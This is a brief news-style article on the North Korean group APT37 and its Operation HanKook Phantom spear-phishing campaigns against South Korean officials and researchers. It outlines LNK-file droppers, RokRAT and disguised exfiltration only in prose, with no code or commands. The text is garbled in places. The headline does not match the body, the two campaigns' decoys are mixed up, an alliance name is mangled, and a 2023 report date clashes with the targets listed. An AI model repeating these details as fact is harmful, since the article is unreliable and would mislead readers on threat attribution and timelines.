North Korean cybercriminals deploy Seoul's confidential data against South Korean citizens for exploitation
In a recent development, the nation-state hacking group known as APT37 has broadened its targeting beyond the Korean peninsula, extending its reach to Japan, Vietnam, and the Middle East, and a wider range of industry verticals since 2017.
The group, also known under several names such as InkySquid, ScarCruft, Reaper, Group123, RedEyes, and Ricochet Chollima, has been linked to North Korea and was behind a large-scale spear-phishing campaign named Operation HanKook Phantom.
Cybersecurity company Mandiant published a report on August 29, 2023, confirming APT37's involvement in this attack, which targeted employees of the South Korean government and intelligence services.
The first campaign used the National Intelligence Research Society Newsletter - Issue 52 as a decoy document. The second attack chain, however, employed a document criticizing South Korea's attempts to improve inter-Korean relations and a July 28 statement issued by Kim Yō-jong, the Vice Department Director of the Central Committee of the Workers' Party of North Korea, as decoys.
The attacks began with the distribution of a legitimate-looking PDF, accompanied by a malicious LNK (Windows shortcut) file. In the second campaign, the LNK file was named as 국가정보연구회 소식지(52호).pdf.
The dropper fetched a secondary payload (abs.tmp) from a command-and-control (C2) server via spoofed HTTP requests, executed it via PowerShell, and deleted traces. The intrusion chain included several methods to obfuscate the malicious payload and evade detection.
Executing the LNK file triggered the download of a payload or command execution, enabling the attacker to compromise the system. The payload delivered RokRAT, a backdoor commonly distributed as an encoded binary file.
Simultaneously, it exfiltrated %TEMP% files via disguised POST requests (mimicking PDF uploads) before deletion, using LOLBins, memory execution, and traffic blending to evade detection. The LNK file self-deletes, followed by a batch script triggering a fileless attack.
The primary targets of the first spear-phishing campaign include recipients of the newsletter, who are typically members of one or several of the following South Korean institutions: National Intelligence Research Association, Kwangwoon University, Korea University, Institute for National Security Strategy, Central Labor Economic Research Institute, Energy Security and Environment Association, National Salvation Spirit Promotion Association, Yangjihoe, Korea Integration Strategy.
In the second attack, targets included the Lee Jae-myung administration, the Ministry of Unification, the S.-South Korea Military Alliance, and the Asia-Pacific Economic Cooperation (APEC). Notably, North Korea declared an end to reconciliation efforts and adopted a hostile, confrontation-based stance in the second attack.
As the cyber threat landscape continues to evolve, it is crucial for organisations to stay vigilant and implement robust security measures to protect against such advanced persistent threats.
